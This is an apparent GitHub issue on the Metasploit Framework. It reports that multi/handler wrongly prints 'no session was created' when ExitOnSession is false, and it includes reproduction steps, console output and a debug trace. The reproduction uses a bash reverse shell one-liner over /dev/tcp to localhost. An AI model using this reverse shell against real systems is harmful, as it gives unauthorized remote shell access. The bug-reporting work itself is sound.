search

rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/
Other
33.75k stars 13.89k forks source link

Error message (`no session`) printed when `ExitOnSession` is set to `false` even session created actually #10114

Open WangYihang opened 6 years ago

WangYihang commented 6 years ago

Steps to reproduce

I found this problem while doing my work on GSoC project, I will try to fix this problem as possible as I can. Here are the steps to reproduce:

Attacker side

  1. ./msfconsole
  2. use multi/handler
  3. set payload cmd/unix/reverse_bash;
  4. set LHOST 127.0.0.1;
  5. set LPORT 4444;
  6. set ExitOnSession false;
  7. exploit

Victim side

Open two terminal and creat two reverse shell session

  1. bash -c 'bash -i >&/dev/tcp/127.0.0.1/4444 2>&1 0>&1'
  2. bash -c 'bash -i >&/dev/tcp/127.0.0.1/4444 2>&1 0>&1'

Expected behavior

msf5 exploit(multi/handler) > run
"[DEBUG]: Running meterpreter shell commands run([])"

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444 
[*] Command shell session 2 opened (127.0.0.1:4444 -> 127.0.0.1:60964) at 2018-05-30 23:24:52 +0800
^C[-] Exploit failed: Interrupt 
[*] Exploit completed, ***********2 sessions was created.***********

msf5 exploit(multi/handler) > sessions
"[DEBUG]: Running meterpreter shell commands sessions([])"

Active sessions
===============

  Id  Name  Type            Information                                          Connection
  --  ----  ----            -----------                                          ----------
  1         shell cmd/unix  sun@sun:~$                 127.0.0.1:4444 -> 127.0.0.1:58000 (127.0.0.1)
  2         shell cmd/unix  sun@sun:~$                 127.0.0.1:4444 -> 127.0.0.1:60964 (127.0.0.1)

Current behavior

Difference between expected behavior and current behavior is marked by stars (***********)

msf5 exploit(multi/handler) > run
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444 
[*] Command shell session 2 opened (127.0.0.1:4444 -> 127.0.0.1:60964) at 2018-05-30 23:24:52 +0800
^C[-] Exploit failed: Interrupt 
[*] Exploit completed, ***********but no session was created.***********

msf5 exploit(multi/handler) > sessions
"[DEBUG]: Running meterpreter shell commands sessions([])"

Active sessions
===============

  Id  Name  Type            Information                                          Connection
  --  ----  ----            -----------                                          ----------
  1         shell cmd/unix  sun@sun:~$                 127.0.0.1:4444 -> 127.0.0.1:58000 (127.0.0.1)
  2         shell cmd/unix  sun@sun:~$                 127.0.0.1:4444 -> 127.0.0.1:60964 (127.0.0.1)

System stuff

Metasploit version

Framework: 5.0.0-dev-a6279e8396
Console  : 5.0.0-dev-a6279e8396

I installed Metasploit with:

OS

Ubuntu 18.10

WangYihang commented 6 years ago

In addition: After debug I notice that: only when ExitOnSession be set to false, the return value of function exploit_simple(lib/msf/base/simple/exploit.rb:59) will be nil

Debug log

[*] Command shell session 2 opened (127.0.0.1:4444 -> 127.0.0.1:42402) at 2018-05-31 10:05:45 +0800
[*] Command shell session 3 opened (127.0.0.1:4444 -> 127.0.0.1:42404) at 2018-05-31 10:05:54 +0800
^C[-] Exploit failed: Interrupt
"[Debug]: Exploit finished! Session: "

From: /home/sun/Desktop/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb @ line 123 Msf::Ui::Console::CommandDispatcher::Exploit#cmd_exploit:

    118:         'OptionStr'      => opt_str,
    119:         'LocalInput'     => driver.input,
    120:         'LocalOutput'    => driver.output,
    121:         'RunAsJob'       => jobify)
    122:       p "[Debug]: Exploit finished! Session: #{session}"
 => 123:       binding.pry
    124:     rescue ::Interrupt
    125:       raise $!
    126:     rescue ::Exception => e
    127:       print_error("Exploit exception (#{mod.refname}): #{e.class} #{e}")
    128:       if(e.class.to_s != 'Msf::OptionValidateError')

[1] pry(#<Msf::Ui::Console::CommandDispatcher::Exploit>)> session
=> nil
busterb commented 6 years ago

This module is not a real exploit, and as such, has no actual success criteria. But we could probably fake it.

WangYihang commented 6 years ago

thank you for reply~ I know that it not a real exploit, but actually the session created... so in my mind, the framework should tell user that N sessions created while listening the port~ Here is my thinking, I think we can just send a specific command (such as: echo '#{random_string}') which can run on multi platform (it seems like function: run_cmd_token), then if the client echo that string, we can find that the exploit is successful... I am not sure it will works or not...

github-actions[bot] commented 3 years ago

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.